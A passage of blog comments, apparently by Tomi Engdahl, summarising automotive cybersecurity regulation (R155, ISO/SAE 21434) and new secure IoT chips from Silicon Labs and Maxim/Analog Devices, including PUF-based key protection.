    Vehicle manufacturers must comply with the R155 automotive cybersecurity regulation for new vehicle type launches in Europe, Japan, and Korea from July 2022 onward; the new automotive cybersecurity standard will be crucial in implementing the R155 requirements across the automotive supply chain. ISO/SAE 21434 provides a rigorous framework intended to enable organizations to design vehicles that are protected against a variety of cybersecurity threats.

    Unlike the ISO 26262 functional safety standard published in 2011, a standard for automotive cybersecurity has lagged behind. That, in turn, has been terrifying automotive companies since vehicles either already have or will have over-the-air (OTA) software updates. More broadly, as hackers have demonstrated time and again, security vulnerabilities can be introduced both in hardware and software flows.

    Connected vehicles linked with external entities—other vehicles, smart city infrastructure, and the cloud—will inevitably require robust security measures to protect the vehicle, its systems, and the back-end networks. The ISO/SAE 21434 standard sets out a framework for effectively managing cybersecurity risks in electrical and electronic (E/E) systems in road vehicles.

  36. Tomi Engdahl says:

    Fully secured sub-gigahertz IoT radio

    IoT operators want devices that have long range, run for a long time on battery power and are 100 percent protected, so that sensitive data stays in the right hands. Silicon Labs answers these wishes with new Secure Vault series system-on-chips.

    Until now, chip security has been something the customer adds to the chips and applications after they come off the supplier's production line. Now SiLabs gives customers the possibility to bring security into their chips already at the factory.

    This means the customer can change product numbers, add encryption keys and certificates, add or remove functions as needed, and so on. With this, the company offers the first fully secured SoCs for sub-gigahertz IoT connectivity, whatever the radio protocol in use.

    The first new-generation chips are the FG23 and ZG23 in the ERF32 series.

  37. Tomi Engdahl says:

    Fully reliable PUF protection for IoT devices

    The only fully reliable technique for protecting, for example, a controller's encryption keys is PUF (physically unclonable function). There is no digitally stored encryption key that could be copied. Maxim Integrated Products, now part of Analog Devices, has introduced the market's lowest-power PUF controller.

    The MAXQ1065 security processor offers turnkey cryptographic functions for, e.g., mutual authentication between devices, secure boot, secure firmware update and secure communications. It includes standard algorithms for key exchange and bulk encryption, or complete transport-layer TLS protection. The chip has 8 kilobytes of secure storage for user data, keys, certificates and counters, with user-defined access-control and lifecycle-management functions for IoT devices.

    Ultra Low-Power Cryptographic Controller with ChipDNATM for Embedded Devices

